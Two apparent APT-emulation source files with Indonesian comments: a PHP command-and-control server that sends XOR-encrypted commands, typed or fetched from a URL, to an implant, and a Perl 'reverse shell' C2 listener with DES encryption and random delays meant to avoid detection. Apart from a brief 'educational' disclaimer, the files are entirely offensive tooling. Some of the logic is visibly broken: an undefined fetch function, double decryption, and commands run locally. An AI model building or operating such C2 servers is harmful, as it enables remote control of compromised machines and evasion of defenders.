File: APT-Energetic-Bear/C2_Server.php
<?php
// Skrip PHP C2 server ini memungkinkan komunikasi jarak jauh menggunakan enkripsi XOR 
// untuk transmisi data yang aman antara server penyerang dan target. 
// Pilihan (perintah atau URL) dienkripsi menggunakan enkripsi XOR dengan kunci yang 
// ditentukan pengguna sebelum dikirim ke target.

// Skrip ini hanya untuk simulasi dan masih dalam tahap pengembangan
// php C2-Server.php

// Penafian: Skrip ini hanya untuk tujuan edukasi, dan penggunaan tanpa izin dapat menyebabkan konsekuensi hukum.

// Fungsi untuk mendekripsi data menggunakan XOR
function xor_encrypt($data, $key) {
    $output = '';
    for ($i = 0; $i < strlen($data); ++$i) {
        // Melakukan operasi XOR antara karakter data dengan karakter kunci secara siklus
        $output .= $data[$i] ^ $key[$i % strlen($key)];
    }
    return $output;
}

// Fungsi untuk mengirim output yang telah dienkripsi ke payload
function send_to_payload($socket, $data, $encryption_key) {
    // Enkripsi data sebelum dikirim
    $encrypted_data = xor_encrypt($data, $encryption_key);
    // Kirim data yang telah dienkripsi melalui soket
    socket_write($socket, $encrypted_data, strlen($encrypted_data));
}

// Fungsi untuk menerima perintah yang telah dienkripsi dari payload
function receive_from_payload($socket, $buffer_size, $encryption_key) {
    // Membaca data yang diterima dari soket
    $encrypted_data = socket_read($socket, $buffer_size);
    // Mendekripsi data yang diterima
    return xor_encrypt($encrypted_data, $encryption_key);
}

// Menampilkan banner dengan petunjuk penggunaan
echo "\033[0;32m";
echo <<<BANNER

 ############################################################################################
# 1. Atur server web atau server HTTP yang dapat menyajikan konten teks.                    #
# 2. Unggah file teks berisi perintah yang ingin dijalankan pada sistem yang terkompromi.   #
# 3. Pastikan file teks dapat diakses melalui HTTP dan catat URL-nya.                       #
# 4. Ketika diminta oleh skrip, masukkan URL yang Anda dapatkan di langkah ini.             #
# CATATAN: Jika Anda memilih untuk mengambil perintah dari URL, skrip akan meminta URL.     #
# Jika Anda memilih untuk memasukkan perintah secara langsung, masukkan perintahnya.        #
 ###########################################################################################

BANNER;
echo "\033[0m\n"; 

// Meminta input IP penyerang
$attacker_ip = readline("[*] Enter your IP: ");
// Meminta input port server C2
$c2_port = readline("[*] Enter C2 server port: ");
// Meminta kunci enkripsi XOR dari pengguna
$encryption_key = readline("[*] Enter XOR encryption key: ");

// Membuat soket dengan protokol TCP/IP
$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if ($socket === false) {
    echo "Socket creation failed: " . socket_strerror(socket_last_error()) . "\n";
    exit(1);
}

// Mengikat soket ke alamat IP dan port yang ditentukan
if (!socket_bind($socket, $attacker_ip, $c2_port)) {
    echo "Socket bind failed: " . socket_strerror(socket_last_error()) . "\n";
    exit(1);
}

// Menyimak koneksi masuk pada soket
if (!socket_listen($socket, 5)) {
    echo "Socket listen failed: " . socket_strerror(socket_last_error()) . "\n";
    exit(1);
}

echo "[*] Waiting for incoming connection...\n";

// Menerima koneksi yang masuk
$client_socket = socket_accept($socket);
if ($client_socket === false) {
    echo "Socket accept failed: " . socket_strerror(socket_last_error()) . "\n";
    exit(1);
}

// Loop utama untuk mengambil dan mengeksekusi perintah
while (true) {
    // Meminta metode input perintah kepada pengguna
    $input_method = strtolower(readline("[*] Choose command input method (url/command): "));
    if ($input_method === 'url') {
        // Mengambil perintah dari URL
        $command_url = readline("[*] Enter command URL: ");
        $command_encrypted = fetch_commands($command_url);
        if ($command_encrypted === false) {
            echo "Error fetching commands from $command_url.\n";
            continue;
        }
        // Mengirim perintah yang dienkripsi ke payload
        send_to_payload($client_socket, $command_encrypted, $encryption_key);
    } elseif ($input_method === 'command') {
        // Mendapatkan perintah langsung dari pengguna
        $command = readline("[*] Enter command to execute: ");
        // Mengirim perintah yang dienkripsi ke payload
        send_to_payload($client_socket, $command, $encryption_key);
    } else {
        // Validasi jika input tidak valid
        echo "Invalid input method. Please choose 'url' or 'command'.\n";
        continue;
    }

    // Menerima output yang dienkripsi dari payload
    $output_encrypted = receive_from_payload($client_socket, 4096, $encryption_key);

    // Mendekripsi output
    $output = xor_encrypt($output_encrypted, $encryption_key);

    // Menampilkan output perintah yang telah didekripsi
    echo "[*] Command Output:\n$output\n";

    // Menunggu beberapa saat sebelum mengambil perintah baru
    sleep(10);
}

// Menutup soket
socket_close($client_socket);
socket_close($socket);

?>

File: APT-Primitive-Bear/C2_Server.pl
#!/usr/bin/perl
# Skrip server C2 (Command and Control) ini menggunakan enkripsi DES untuk komunikasi jarak jauh yang aman 
# antara server penyerang dan target. Skrip ini hanya untuk simulasi dan masih dalam tahap pengembangan.

use strict;
use warnings;
use IO::Socket::INET; # Modul untuk operasi soket
use MIME::Base64;     # Modul untuk encoding Base64
use Crypt::DES;       # Modul untuk enkripsi DES
use Time::HiRes qw(usleep); # Modul untuk mengatur waktu jeda secara presisi

# Warna untuk output terminal
my $WHITE = "\033[97m"; 
my $RESET = "\033[0m";

# Menampilkan banner saat skrip dijalankan
print $WHITE . qq(
██████╗ ██████╗ ██╗███╗   ███╗██╗████████╗██╗██╗   ██╗███████╗    ██████╗ ███████╗ █████╗ ██████╗ 
██╔══██╗██╔══██╗██║████╗ ████║██║╚══██╔══╝██║██║   ██║██╔════╝    ██╔══██╗██╔════╝██╔══██╗██╔══██╗
██████╔╝██████╔╝██║██╔████╔██║██║   ██║   ██║██║   ██║█████╗      ██████╔╝█████╗  ███████║██████╔╝
██╔═══╝ ██╔══██╗██║██║╚██╔╝██║██║   ██║   ██║╚██╗ ██╔╝██╔══╝      ██╔══██╗██╔══╝  ██╔══██║██╔══██╗
██║     ██║  ██║██║██║ ╚═╝ ██║██║   ██║   ██║ ╚████╔╝ ███████╗    ██████╔╝███████╗██║  ██║██║  ██║
╚═╝     ╚═╝  ╚═╝╚═╝╚═╝     ╚═╝╚═╝   ╚═╝   ╚═╝  ╚═══╝  ╚══════╝    ╚═════╝ ╚══════╝╚═╝  ╚═╝╚═╝  ╚═╝
) . $RESET;

# Fungsi untuk mendapatkan informasi IP penyerang
sub get_attacker_info {
    print "Masukkan alamat IP untuk reverse shell: ";
    my $attacker_ip = <STDIN>; # Input IP dari pengguna
    chomp($attacker_ip);
    return $attacker_ip;
}

# Fungsi untuk mendapatkan nomor port
sub get_port {
    print "Masukkan nomor port untuk reverse shell: ";
    my $port = <STDIN>; # Input port dari pengguna
    chomp($port);
    return $port;
}

# Fungsi untuk mendapatkan kunci DES
sub get_des_key {
    print "Masukkan kunci DES Anda (harus 8 byte): ";
    my $key = <STDIN>; # Input kunci dari pengguna
    chomp($key);
    # Validasi panjang kunci harus 8 byte
    if (length($key) != 8) {
        print "Panjang kunci tidak valid. Kunci DES harus 8 byte.\n";
        return get_des_key(); # Rekursi jika panjang tidak sesuai
    }
    return $key;
}

# Fungsi untuk mengenkripsi data menggunakan DES
sub encrypt_data {
    my ($data, $key) = @_;
    my $cipher = Crypt::DES->new($key); # Membuat objek DES dengan kunci
    # Menambahkan padding jika panjang data tidak kelipatan 8
    my $data_padded = $data . ("\0" x (8 - length($data) % 8));
    my $encrypted = $cipher->encrypt($data_padded); # Enkripsi data
    return encode_base64($encrypted); # Encoding hasil enkripsi dengan Base64
}

# Fungsi utama
sub main {
    my $ip = get_attacker_info(); # Mendapatkan IP penyerang
    my $port = get_port();        # Mendapatkan nomor port
    my $key = get_des_key();      # Mendapatkan kunci DES

    # Membuat soket untuk mendengarkan koneksi
    my $socket = IO::Socket::INET->new(
        LocalAddr => $ip,
        LocalPort => $port,
        Proto     => 'tcp', # Protokol TCP
        Listen    => 1,     # Maksimal 1 koneksi dalam antrean
        Reuse     => 1,     # Mengizinkan reuse port
    ) or die "Tidak dapat membuat soket: $!\n";

    print "Menunggu koneksi masuk...\n";
    my $client_socket = $socket->accept(); # Menerima koneksi dari klien

    while (1) {
        print "Masukkan perintah untuk dieksekusi (atau ketik 'exit' untuk keluar): ";
        my $command = <STDIN>; # Input perintah dari pengguna
        chomp($command);
        last if $command eq 'exit'; # Keluar dari loop jika perintah adalah 'exit'

        next unless $command; # Lewati jika perintah kosong

        # Eksekusi perintah di sistem dan ambil hasilnya
        my $result = `$command 2>&1`;
        $result = "" unless defined $result; # Pastikan $result terdefinisi
        # Enkripsi hasil perintah menggunakan kunci DES
        my $encrypted_result = encrypt_data($result, $key);

        # Kirim perintah dan hasil yang terenkripsi ke klien
        $client_socket->send($command . "\n" . $encrypted_result);
        # Jeda acak antara 1 hingga 5 detik untuk menghindari deteksi
        usleep(int(rand(4) + 1) * 1000000);
    }

    close $client_socket; # Tutup koneksi klien
    close $socket;        # Tutup soket utama
}

main(); # Memanggil fungsi utama untuk menjalankan skrip
